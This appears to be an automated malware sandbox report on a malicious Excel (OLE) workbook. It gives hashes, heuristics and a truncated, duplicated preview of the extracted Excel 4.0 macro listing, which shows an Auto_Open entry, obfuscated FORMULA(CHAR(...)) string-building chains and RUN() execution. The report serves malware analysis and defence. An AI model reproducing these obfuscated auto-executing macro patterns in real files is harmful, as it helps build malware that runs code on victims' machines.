Office (OLE) malware analysis — malicious · b4dab19bdb7a01e0

MALICIOUS

Office (OLE)

245.5 KB Created: 2020-05-22 10:44:24 Authoring application: Microsoft Excel First seen: 2020-07-24

MD5: e157736d063d1bbc2dab45e10c183c53 SHA-1: c2c8b309901ba8bbd1170babca0a08c9145f779b SHA-256: b4dab19bdb7a01e06444e73ccf4ed265f720351cb5c4fcc3640abd2c3c3f238f

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The file contains obfuscated Excel 4.0 macros, specifically an Auto_Open entry, which is a critical finding. The macros appear to be designed to execute a payload through a chain of risky formulas and state-transfer operations. The obfuscation and auto-execution chain suggest a malicious intent to run arbitrary code.

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
Obfuscated XLM Auto_Open execution chain critical OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 125741 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	125741 bytes
SHA-256: `141372947f19c659954ee5043c7514eab93b01f0ec72e1bc57a6d20078f6f3d8`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!BQ11418 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,FZ6,"",0.68230277185501064796 ' Sheet,FU57,"",-127.00000000000000000000 ' Sheet,CD96,"",144.00000000000000000000 ' Sheet,ER114,"",0.69743589743589740060 ' Sheet,DH127,"",55.20003906249999658939 ' Sheet,DP141,"",0.77688172043010750301 ' Sheet,HD153,"",-61.25000000000000000000 ' Sheet,IY185,"",0.87048192771084342834 ' Sheet,IW188,"",-0.14386792452830188260 ' Sheet,BN210,"",-112.00000000000000000000 ' Sheet,FF279,"",-10.60000976562499985789 ' Sheet,HX279,"",0.14792899408284024276 ' Sheet,HA349,"",534.00000000000000000000 ' Sheet,BG437,"",2.12195121951219523027 ' Sheet,DM447,"FORMULA(CHAR(HV1177+DR20468)&CHAR(IL314CS42027)&CHAR(GE35045+IJ2359)&CHAR(GE35045+EB5600)&CHAR(HV1177/DN34685)&CHAR(ED38645+BW5926)&CHAR(GP24917-DW39087)&CHAR(D15810/HQ55005)&CHAR(HV1177+BN17005)&CHAR(CQ18904-T11920)&CHAR(GP24917+EM57218)&CHAR(GT37008-JM42022)&CHAR(CQ18904JL36736)&CHAR(ED38645IR23712)&CHAR(FV32581+JI17308)&CHAR(CQ18904+JK38956)&CHAR(GE35045GD64359)&CHAR(GT37008+IY29637)&CHAR(FV32581-EQ61782)&CHAR(HN14253+DT56400)&CHAR(IL314+IJ6764)&CHAR(GE35045/CC47745)&CHAR(GP24917/IS12220)&CHAR(D15810+FF12102)&CHAR(HV1177+CH11799)&CHAR(HN14253/FQ55859)&CHAR(ED38645/GN40052)&CHAR(IL314-BY59128)&CHAR(FV32581/ED64950)&CHAR(HN14253+GW37646)&CHAR(FV32581/GW3148)&CHAR(HN14253-CN44720)&CHAR(GT37008+FG46465)&CHAR(GE35045-EA44580)&CHAR(GT37008+HV21932)&CHAR(GT37008CR50739)&CHAR(CQ18904X63756)&CHAR(ED38645+CL50108)&CHAR(GE35045+BZ60563)&CHAR(CQ18904/HG21343)&CHAR(GE35045GA26799)&CHAR(IL314-BI58683)&CHAR(ED38645/EW42369)&CHAR(GP24917/BK31699)&CHAR(GT37008-JD6065)&CHAR(HV1177FO8271)&CHAR(FV32581CD23452)&CHAR(IL314-FX57114)&CHAR(CQ18904CU39142)&CHAR(FV32581+HL56583)&CHAR(GT37008DT24526)&CHAR(GE35045+CR61983)&CHAR(GE35045+EH57750)&CHAR(CQ18904/BG17327)&CHAR(GE35045-EU45834)&CHAR(GP24917+GP56215)&CHAR(D15810HV30133)&CHAR(CQ18904/JM16517)&CHAR(HN14253/FH42116)&CHAR(GT37008/CY38105)&CHAR(ED38645+HR24866)&CHAR(GE35045/BB60175)&CHAR(GE35045+BL15841)&CHAR(CQ18904/CK30208)&CHAR(IL314X48587)&CHAR(GT37008BR24511)&CHAR(IL314-HG43316)&CHAR(CQ18904+DY8642)&CHAR(GP24917BF27813)&CHAR(FV32581CZ18182)&CHAR(GE35045-CY51477)&CHAR(IL314-IR52917)&CHAR(D15810/HR2311)&CHAR(D15810GB12259)&CHAR(HN14253JU43184)&CHAR(HN14253FA33081)&CHAR(ED38645+CQ28274)&CHAR(D15810/JA58852)&CHAR(HN14253CL15861)&CHAR(D15810-EV51058)&CHAR(GP24917-JL22569)&CHAR(ED38645GQ60653)&CHAR(GP24917/JE64709),DM448)","" ' Sheet,DM449,RUN(JU61309),"" ' Sheet,JD507,"",90.00000000000000000000 ' Sheet,HA539,"",334.00000000000000000000 ' Sheet,CH620,"",0.65066666666666661545 ' Sheet,DH628,"",-1.26582278481012666660 ' Sheet,IZ635,"",0.26562500000000000000 ' Sheet,FF696,"",-369.00000000000000000000 ' Sheet,GN720,"",1.90099009900990090216 ' Sheet,JC727,"SET.VALUE(DN10294,-303.00000000000000000000-GET.CELL(8,CH6902)2)","" ' Sheet,JC728,GOTO(DS25791),"" ' Sheet,HZ743,"",58.00000000000000000000 ' Sheet,G786,"",6.75000000000000000000 ' Sheet,CK912,"",-91.00000000000000000000 ' Sheet,HC956,"",260.00000000000000000000 ' Sheet,F1008,"",0.50978260869565217295 ' Sheet,BF1014,"",0.03122130394857667440 ' Sheet,EX1043,"",223.50000000000000000000 ' Sheet,IT1063,"",-9.60000488281250063949 ' Sheet,GQ1137,"",267.00000000000000000000 ' Sheet,D1226,"",-28.25000000000000000000 ' Sheet,BS1299,"",369.00000000000000000000 ' Sheet,II1323,"",-113.00000000000000000000 ' Sheet,CJ1345,"FORMULA(CHAR(ED38645+GF23002)&CHAR(GE35045/EG33423)&CHAR(HN14253-FA37827)&CHAR(FV32581CB56213)&CHAR(IL314/Y45729)&CHAR(D15810/DN34508)&CHAR(GP24917JS63802)&CHAR(D15810+GO60464)&CHAR(GT37008+BI29343)&CHAR(GP24917+FL57329)&CH ... (truncated)

SHA-256: 141372947f19c659954ee5043c7514eab93b01f0ec72e1bc57a6d20078f6f3d8

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!BQ11418 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,FZ6,"",0.68230277185501064796
'  Sheet,FU57,"",-127.00000000000000000000
'  Sheet,CD96,"",144.00000000000000000000
'  Sheet,ER114,"",0.69743589743589740060
'  Sheet,DH127,"",55.20003906249999658939
'  Sheet,DP141,"",0.77688172043010750301
'  Sheet,HD153,"",-61.25000000000000000000
'  Sheet,IY185,"",0.87048192771084342834
'  Sheet,IW188,"",-0.14386792452830188260
'  Sheet,BN210,"",-112.00000000000000000000
'  Sheet,FF279,"",-10.60000976562499985789
'  Sheet,HX279,"",0.14792899408284024276
'  Sheet,HA349,"",534.00000000000000000000
'  Sheet,BG437,"",2.12195121951219523027
'  Sheet,DM447,"FORMULA(CHAR(HV1177+DR20468)&CHAR(IL314*CS42027)&CHAR(GE35045+IJ2359)&CHAR(GE35045+EB5600)&CHAR(HV1177/DN34685)&CHAR(ED38645+BW5926)&CHAR(GP24917-DW39087)&CHAR(D15810/HQ55005)&CHAR(HV1177+BN17005)&CHAR(CQ18904-T11920)&CHAR(GP24917+EM57218)&CHAR(GT37008-JM42022)&CHAR(CQ18904*JL36736)&CHAR(ED38645*IR23712)&CHAR(FV32581+JI17308)&CHAR(CQ18904+JK38956)&CHAR(GE35045*GD64359)&CHAR(GT37008+IY29637)&CHAR(FV32581-EQ61782)&CHAR(HN14253+DT56400)&CHAR(IL314+IJ6764)&CHAR(GE35045/CC47745)&CHAR(GP24917/IS12220)&CHAR(D15810+FF12102)&CHAR(HV1177+CH11799)&CHAR(HN14253/FQ55859)&CHAR(ED38645/GN40052)&CHAR(IL314-BY59128)&CHAR(FV32581/ED64950)&CHAR(HN14253+GW37646)&CHAR(FV32581/GW3148)&CHAR(HN14253-CN44720)&CHAR(GT37008+FG46465)&CHAR(GE35045-EA44580)&CHAR(GT37008+HV21932)&CHAR(GT37008*CR50739)&CHAR(CQ18904*X63756)&CHAR(ED38645+CL50108)&CHAR(GE35045+BZ60563)&CHAR(CQ18904/HG21343)&CHAR(GE35045*GA26799)&CHAR(IL314-BI58683)&CHAR(ED38645/EW42369)&CHAR(GP24917/BK31699)&CHAR(GT37008-JD6065)&CHAR(HV1177*FO8271)&CHAR(FV32581*CD23452)&CHAR(IL314-FX57114)&CHAR(CQ18904*CU39142)&CHAR(FV32581+HL56583)&CHAR(GT37008*DT24526)&CHAR(GE35045+CR61983)&CHAR(GE35045+EH57750)&CHAR(CQ18904/BG17327)&CHAR(GE35045-EU45834)&CHAR(GP24917+GP56215)&CHAR(D15810*HV30133)&CHAR(CQ18904/JM16517)&CHAR(HN14253/FH42116)&CHAR(GT37008/CY38105)&CHAR(ED38645+HR24866)&CHAR(GE35045/BB60175)&CHAR(GE35045+BL15841)&CHAR(CQ18904/CK30208)&CHAR(IL314*X48587)&CHAR(GT37008*BR24511)&CHAR(IL314-HG43316)&CHAR(CQ18904+DY8642)&CHAR(GP24917*BF27813)&CHAR(FV32581*CZ18182)&CHAR(GE35045-CY51477)&CHAR(IL314-IR52917)&CHAR(D15810/HR2311)&CHAR(D15810*GB12259)&CHAR(HN14253*JU43184)&CHAR(HN14253*FA33081)&CHAR(ED38645+CQ28274)&CHAR(D15810/JA58852)&CHAR(HN14253*CL15861)&CHAR(D15810-EV51058)&CHAR(GP24917-JL22569)&CHAR(ED38645*GQ60653)&CHAR(GP24917/JE64709),DM448)",""
'  Sheet,DM449,RUN(JU61309),""
'  Sheet,JD507,"",90.00000000000000000000
'  Sheet,HA539,"",334.00000000000000000000
'  Sheet,CH620,"",0.65066666666666661545
'  Sheet,DH628,"",-1.26582278481012666660
'  Sheet,IZ635,"",0.26562500000000000000
'  Sheet,FF696,"",-369.00000000000000000000
'  Sheet,GN720,"",1.90099009900990090216
'  Sheet,JC727,"SET.VALUE(DN10294,-303.00000000000000000000-GET.CELL(8,CH6902)*2)",""
'  Sheet,JC728,GOTO(DS25791),""
'  Sheet,HZ743,"",58.00000000000000000000
'  Sheet,G786,"",6.75000000000000000000
'  Sheet,CK912,"",-91.00000000000000000000
'  Sheet,HC956,"",260.00000000000000000000
'  Sheet,F1008,"",0.50978260869565217295
'  Sheet,BF1014,"",0.03122130394857667440
'  Sheet,EX1043,"",223.50000000000000000000
'  Sheet,IT1063,"",-9.60000488281250063949
'  Sheet,GQ1137,"",267.00000000000000000000
'  Sheet,D1226,"",-28.25000000000000000000
'  Sheet,BS1299,"",369.00000000000000000000
'  Sheet,II1323,"",-113.00000000000000000000
'  Sheet,CJ1345,"FORMULA(CHAR(ED38645+GF23002)&CHAR(GE35045/EG33423)&CHAR(HN14253-FA37827)&CHAR(FV32581*CB56213)&CHAR(IL314/Y45729)&CHAR(D15810/DN34508)&CHAR(GP24917*JS63802)&CHAR(D15810+GO60464)&CHAR(GT37008+BI29343)&CHAR(GP24917+FL57329)&CH
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.